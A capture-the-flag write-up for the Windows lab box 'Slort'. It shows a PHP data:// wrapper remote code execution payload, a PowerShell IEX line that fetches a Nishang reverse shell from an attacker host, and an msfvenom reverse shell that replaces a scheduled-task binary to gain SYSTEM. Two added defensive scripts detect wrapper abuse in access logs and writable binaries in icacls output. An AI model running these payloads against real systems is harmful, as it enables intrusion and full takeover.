Target // Slort
Platform: OffSec Proving Grounds
OS: Windows
Difficulty: Medium
IP: 192.168.105.53

Enumeration

Nmap

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     FileZilla ftpd 0.9.41 beta
135/tcp  open  msrpc   Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql   MariaDB (host not allowed)
4443/tcp open  http    Apache httpd 2.4.43 (XAMPP)
8080/tcp open  http    Apache httpd 2.4.43 (XAMPP)

Windows box running XAMPP on two ports (4443 and 8080). FTP requires credentials, and MariaDB refuses connections from our host ("host not allowed"), so it is effectively localhost-only.

Port 8080 - XAMPP Web App

Directory fuzzing and manual crawling reveals an interesting endpoint:

http://192.168.105.53:8080/site/index.php?page=main.php

The page parameter smells like file inclusion.


Foothold

PHP Wrapper RCE

The page parameter is vulnerable to LFI, RFI, and PHP wrappers. The data:// wrapper gives direct code execution:

http://192.168.105.53:8080/site/index.php?page=data:text/plain,<?php echo shell_exec("whoami") ?>

For a proper shell, use the wrapper to download and execute a Nishang reverse shell in memory. URL-encode the payload and send via Burp:

GET /site/index.php?page=data:text/plain,<?php+echo+shell_exec("powershell.exe+-nop+-exec+bypass+IEX+(IWR+http%3a//192.168.49.105/Invoke-PowerShellTcp.ps1+-UseBasicParsing)")+?> HTTP/1.1

Shell as rupert – unprivileged user with no interesting permissions.
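From the defending side, every request in this section lands in Apache's access log with the wrapper or scheme still visible in the query string, which makes this class of attack cheap to detect. The following script is an added example written for this write-up, not code from the original post: it parses constructed access-log lines (assumed to be in the "combined" format XAMPP ships with), URL-decodes include-style parameters twice so that double-encoded values are not missed, and labels anything that starts with a stream wrapper or URL scheme (data:, php://, http:// ...) or contains a traversal sequence. The parameter list and the sample IPs are assumptions.

```python
"""Flag PHP stream-wrapper and traversal attempts in Apache access logs.

Added example for this write-up: the log lines below are constructed, and the
log layout is assumed to be Apache's "combined" format as shipped with XAMPP.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format: client, ident, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Query parameters that commonly end up in include()/require() (assumption: extend per app).
INCLUDE_PARAMS = {"page", "file", "include", "path", "template", "view"}

# Stream wrappers and URL schemes that a template name should never start with.
WRAPPER_RE = re.compile(
    r"^\s*(data|php|phar|file|expect|glob|zip|compress\.zlib|ftp|ftps|http|https):", re.I
)
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")


def classify_value(value: str):
    """Label one fully decoded parameter value, or return None if it looks benign."""
    m = WRAPPER_RE.match(value)
    if m:
        return "wrapper:" + m.group(1).lower()
    if TRAVERSAL_RE.search(value):
        return "traversal"
    return None


def scan_line(line: str):
    """Return a list of finding dicts for one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    # parse_qs decodes %xx and '+' once; unquote() a second time so that a
    # double-encoded value such as %252e%252e/ still reveals the traversal.
    for param, values in parse_qs(query, keep_blank_values=True).items():
        if param.lower() not in INCLUDE_PARAMS:
            continue
        for raw in values:
            decoded = unquote(raw)
            label = classify_value(decoded)
            if label:
                findings.append({
                    "ip": m.group("ip"), "ts": m.group("ts"),
                    "param": param, "label": label, "value": decoded,
                })
    return findings


def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for line in lines for f in scan_line(line)]


# Constructed sample lines (not from the target): one benign request, a data:
# wrapper carrying a harmless payload, a php:// wrapper, a double-encoded
# traversal, and a remote include attempt.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:57:01 +0000] "GET /site/index.php?page=data:text/plain,%3C%3Fphp+echo+1%3B+%3F%3E HTTP/1.1" 200 3 "-" "curl/8.0"',
    '10.0.0.9 - - [10/Oct/2023:13:58:12 +0000] "GET /site/index.php?page=php://input HTTP/1.1" 200 2048 "-" "curl/8.0"',
    '10.0.0.9 - - [10/Oct/2023:13:59:40 +0000] "GET /site/index.php?page=%252e%252e/%252e%252e/windows/win.ini HTTP/1.1" 404 200 "-" "curl/8.0"',
    '10.0.0.7 - - [10/Oct/2023:14:01:00 +0000] "GET /site/index.php?page=http://203.0.113.10/x.txt HTTP/1.1" 500 0 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r} -> {f['label']}")
```

Feeding the real access.log through scan_log() gives one record per suspicious parameter with the client IP and timestamp, which is enough to alert on. Note that the double decode is what catches the traversal line; a single decode would leave it as %2e%2e and miss it.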


Privilege Escalation

Scheduled Task Binary Replacement

Poking around the filesystem reveals C:\backup\ containing a binary (TFTP.EXE) and a text file explaining it runs every 5 minutes as a scheduled task.

Replace it with a reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.105 LPORT=4466 -f exe > pwn.exe

# Download and overwrite the scheduled binary
IWR http://192.168.49.105/pwn.exe -UseBasicParsing -o C:\backup\TFTP.EXE

Wait for the task to fire, catch a SYSTEM shell.
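The root cause here is a binary executed as SYSTEM that a standard user can overwrite, and that is something an administrator can audit from the file ACLs alone. The script below is an added example for this write-up, not code from the original post: it parses the output of icacls (assumed here to have been run as icacls C:\backup\* on the host; the output shown is constructed, including the SLORT\rupert account and the extra files) and reports every non-deny ACE that grants a write-capable right to a principal outside a trusted set. The trusted set and the file names are assumptions to adjust per environment.

```python
r"""Flag scheduled-task binaries that low-privilege principals can modify.

Added example for this write-up: the icacls output below is constructed and
assumed to come from running  icacls C:\backup\*  on the host. Not code from
the original post.
"""
import re

# One icacls ACE: "DOMAIN\Name:(I)(F)", "Everyone:(RX)" or "NT AUTHORITY\SYSTEM:(F)".
# The first line of each file block carries the path before the first ACE.
ACE_RE = re.compile(
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|APPLICATION PACKAGE AUTHORITY|[^\s\\:]+)"
    r"(?:\\[^:\\]+)?):(?P<flags>(?:\([^)]+\))+)\s*$"
)

INHERIT_TOKENS = {"I", "OI", "CI", "IO", "NP"}
# Simple rights (F, M, W, D) plus the specific rights that let a principal change,
# replace or re-own the file: write data, append, write attributes, delete, write DAC/owner.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DE", "WDAC", "WO", "DC"}
# Principals expected to be able to modify a binary that runs as SYSTEM (assumption).
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\ADMINISTRATORS", "NT SERVICE\\TRUSTEDINSTALLER"}


def parse_icacls(text: str):
    """Parse icacls output into ACE dicts: path, principal, deny flag, rights tokens."""
    entries, current_path = [], None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue  # blank lines and the "Successfully processed" footer
        prefix = line[:m.start()].strip()
        if prefix:  # first line of a file block carries the path
            current_path = prefix
        groups = re.findall(r"\(([^)]+)\)", m.group("flags"))
        tokens = {t.strip().upper() for g in groups for t in g.split(",")}
        entries.append({
            "path": current_path,
            "principal": m.group("principal"),
            "deny": "DENY" in tokens,
            "rights": tokens - INHERIT_TOKENS - {"DENY"},
        })
    return entries


def find_writable_by_low_priv(entries):
    """Return the ACEs that let a non-trusted principal alter the file."""
    hits = []
    for e in entries:
        if e["deny"] or e["principal"].upper() in TRUSTED:
            continue
        writable = sorted(e["rights"] & WRITE_RIGHTS)
        if writable:
            hits.append({"path": e["path"], "principal": e["principal"], "rights": writable})
    return hits


# Constructed icacls output (assumed format): TFTP.EXE is world-writable via
# BUILTIN\Users, info.txt is correctly locked down, note.bat grants the
# SLORT\rupert account delete/write rights but carries a deny ACE for Users.
ICACLS_OUTPUT = r"""C:\backup\TFTP.EXE BUILTIN\Users:(I)(F)
                   NT AUTHORITY\SYSTEM:(I)(F)
                   BUILTIN\Administrators:(I)(F)
C:\backup\info.txt NT AUTHORITY\SYSTEM:(I)(F)
                   BUILTIN\Administrators:(I)(F)
                   BUILTIN\Users:(I)(RX)
C:\backup\note.bat SLORT\rupert:(DE,WD,AD,RX)
                   BUILTIN\Users:(DENY)(F)

Successfully processed 3 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for h in find_writable_by_low_priv(parse_icacls(ICACLS_OUTPUT)):
        print(f"{h['path']}: {h['principal']} has {','.join(h['rights'])}")
```

Any hit on a file referenced by a scheduled task action (or a service binary) is the privilege escalation described above. The fix is to restrict the ACL so only SYSTEM and Administrators can write, and to keep the binary out of a directory that inherits permissive permissions.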


Proof

root@slort

whoami
nt authority\system

Key Takeaways

[ Notes ]
  • When you see ?page= or ?file= parameters in PHP apps, always test for LFI/RFI and PHP wrappers (data://, php://)
  • The data:// wrapper is often overlooked but provides clean one-shot RCE without needing to upload files
  • Always check for writable scheduled task binaries – C:\backup\ and similar directories are prime targets
  • Don’t forget to check XAMPP default configs and directories on Windows boxes